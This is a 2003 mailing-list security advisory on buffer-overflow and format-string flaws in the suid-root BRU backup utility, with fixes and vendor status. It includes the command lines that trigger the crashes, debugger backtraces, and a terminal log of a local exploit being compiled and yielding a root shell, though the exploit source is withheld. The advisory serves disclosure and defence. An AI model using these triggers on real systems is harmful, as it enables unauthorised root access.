[VulnWatch] SRT2003-07-16-0358 - bru has buffer overflow and format issues
From: KF (dotslash_at_snosoft.com)
Date: 07/16/03
- Previous message: Thor Larholm: "[VulnWatch] Microsoft ISA Server HTTP error handler XSS (TL#007)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 16 Jul 2003 17:23:54 +0000 To: bugtraq <bugtraq@securityfocus.com>
Secure Network Operations, Inc. http://www.secnetops.com
Anvil IDS appliance http://www.secnetops.com/products
Strategic Reconnaissance Team research@secnetops.com
Team Lead Contact kf@secnetops.com
Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.
Quick Summary:
************************************************************************
Advisory Number : SRT2003-07-16-0358
Product : Backup and Restore Utility for Unix (BRU)
Version : <= 17.0
Vendor : http://www.tolisgroup.com (purchased EST code)
Class : local
Criticality : Medium to Low
Operating System(s) : *nix
High Level Explanation
************************************************************************
High Level Description : bru has buffer overflow and format issues
What to do : upgrade to the Tolisgroup BRU or chmod -s bru
Technical Details
************************************************************************
Proof Of Concept Status : SNO has exploits for the described situation
Low Level Description :
EST BRU(TM) Backup and Restore Utility is the No. 1 award winning product
for Linux backup, having won more awards and maintained a larger installed
base than any other commercial Linux backup solution. A respected industry
veteran, EST has been developing UNIX backup products since 1985.
Enhanced Software Technologies Inc. the previous vendor of BRU has sold
its product to the current vendor The Tolisgroup.
As described by The Tolisgroup, BRU is backup science at its best. By
exacting design, BRU solutions never abort the restore and recover the
most data of any backup solution.
In the past there have been a few issues with BRU reported to the public.
One such issue (BRUEXECLOG) has prompted the vendor to remove the suid
bit from BRU. The current Tolisgroup version of BRU does not by default
ship with the suid bit set, however we feel it is possible users could
read old suggestions on newsgroups or the web and chmod +s bru. The
Tolisgroup has never shipped BRU with a suid bit. In the past BRU would
prompt regular users to set the suid bit on BRU however I can not confirm
that the Tolisgroup version has ever had this behavior.
elguapo@gentoo elguapo $ bru
bru: [W171] warning - BRU must be owned by root and have suid bit set
By default BRU-15.1-3.i386.rpm has the suid bit, BRU2000-15.0P-1.i386.rpm
however does not. Both versions will prompt a user to set the bit if it
does not already exist.
The below mentioned issues DO affect the Tolisgroup version however if
the user has not set the suid bit there is no problem. The Tolisgroup has
stated it will take measures to ensure in the future BRU does not contain
the potential to be exploited.
The 2 issues at hand can be reproduced as follows...
elguapo@gentoo elguapo $ /bru/bru `perl -e 'print "A" x 3050'`
bru: [E155] error - memory fault (SIGSEGV)
elguapo@gentoo elguapo $ /bru/bru %n%n%n%n
bru: [E155] error - memory fault (SIGSEGV)
Both issues appear to be caused by poor usage of vsprintf().
Starting program: /bin/bru %n%n%n%n%n
Program received signal SIGSEGV, Segmentation fault.
0x40071d96 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0x40071d96 in vfprintf () from /lib/libc.so.6
#1 0x0805543a in step ()
Starting program: /bin/bru `perl -e 'print "A" x 3025'`
Program received signal SIGSEGV, Segmentation fault.
0x08060027 in step ()
(gdb) bt
#0 0x08060027 in step ()
Cannot access memory at address 0x41414141
These issues can easily be exploited by an attacker to gain root access.
elguapo@gentoo tmp $ head ./0x82-BRU_overformat.c
/*
**
** backup and restore utility (BRU) local root exploit.
** Target package: BRU-15.1-3.i386.rpm
**
** bug found by "Kevin Finisterre"(KF), <dotslash@snosoft.com>.
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/
elguapo@gentoo tmp $ cc -o 0x82-BRU_overformat 0x82-BRU_overformat.c
elguapo@gentoo tmp $ ./0x82-BRU_overformat 1
0x82-BRU_overformat - backup and restore utility (BRU) local root exploit.
Target package: BRU-15.1-3.i386.rpm
[*] shellcode: 0xbfffff9e
[*] It's my message:
KFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFK...
KFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFthanks!!˙˙ż
sh-2.05b# id
uid=0(root) gid=0(root) groups=100(users),10(wheel)
elguapo@gentoo tmp $ ./0x82-BRU_overformat 2
0x82-BRU_overformat - backup and restore utility (BRU) local root exploit.
Target package: BRU-15.1-3.i386.rpm
[*] shellcode: 0xbfffff9e, $-flag: 70, pad: 0
x82: [E155] error - memory fault (SIGSEGV)
...
[*] shellcode: 0xbfffff9e, $-flag: 73, pad: 2
x82: [E001] specify mode (-cdeghitx)
sh-2.05b# id
uid=0(root) gid=0(root) groups=100(users),10(wheel)
Patch or Workaround : chmod -s /path/to/bru or Purchase BRU from
The Tolisgroup.
Vendor Status : Original vendor no longer exists. The Tolisgroup
BRU is not vulnerable by default, please upgrade.
Bugtraq URL : to be assigned
------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.
- Previous message: Thor Larholm: "[VulnWatch] Microsoft ISA Server HTTP error handler XSS (TL#007)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
